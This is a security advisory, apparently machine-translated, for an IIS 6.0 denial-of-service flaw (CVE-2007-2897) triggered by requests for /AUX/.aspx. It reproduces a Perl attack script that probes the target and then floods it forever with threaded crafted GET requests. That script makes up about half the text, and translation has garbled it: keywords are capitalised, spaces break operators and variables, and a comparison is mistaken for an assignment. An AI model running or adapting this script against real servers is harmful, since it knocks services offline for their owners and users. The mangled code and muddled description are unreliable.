Microsoft iis dos device request Security Restriction Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
Microsoft IIS
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51527
Cve id: CVE-2007-2897

Internet Information Services (IIS) is a basic Internet service provided by Microsoft based on Microsoft Windows.

IIS 6.0 has a Denial-of-Service vulnerability when requesting specially crafted paths. Remote attackers can exploit this vulnerability to suspend or leak sensitive information. attackers who have physical access to the system can execute arbitrary code with the current user privilege.

<* Source: 3APA3A (3APA3A@security.nnov.ru)

Link: http://seclists.org/fulldisclosure/2007/May/378
Http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0419.html
*>

Test method:
--------------------------------------------------------------------------------
Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

3APA3A (3APA3A@security.nnov.ru) provides the following test methods:

# When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/. aspx the server gets instable and non responsive. This happens only
# To servers which respond a runtime error (System. Web. HttpException)
# And take two or more seconds to respond to the/AUX/. aspx GET request.
#
#
# Signed,
# Kingdom () gmx net
######################################## ##################################
###************************************* **********************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### By Kingdom, May/2007
### Better run this from a Linux system
######################################## ##################################

Use IO: Socket;
Use threads;

If ($ ARGV [0] eq ") {exit ;}
My $ host = $ ARGV [0];

$ | = 1;

Sub sendit {
$ Sock = IO: Socket: INET-> new (PeerAddr => $ host,
PeerPort => 'HTTP (80 )',
Proto => 'tcp ');

Print $ sock "GET/AUX/. aspx HTTP/1.1 \ r \ nHost:
$ Host \ r \ nConnection: close \ r \ n ";
}

$ Sock = IO: Socket: INET-> new (PeerAddr => $ host,
PeerPort => 'HTTP (80 )',
Proto => 'tcp ');

Print $ sock "GET/AUX/. aspx HTTP/1.1 \ r \ nHost:
$ Host \ r \ nConnection: close \ r \ n ";

$ K = 0;
While (<$ sock> ){
If ($ _ = ~ /Runtime \ sError/) | ($ _ = ~ /HttpException /)){
$ K = 1;
Last;
}
}

If ($ k = 0 ){
Print "Server does not seem vulnerable to this attack. \ n ";
Exit;
}

Print "ATTACK! \ N ";

While (1 ){

For (my $ I = 0; $ I <= 100; $ I ++ ){
$ Thr = threads-> new (\ & sendit );
Print "\ r \ r$ I/100 ";
}

Foreach $ thr (threads-> list ){
$ Thr-> join;
}
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.microsoft.com/technet/security/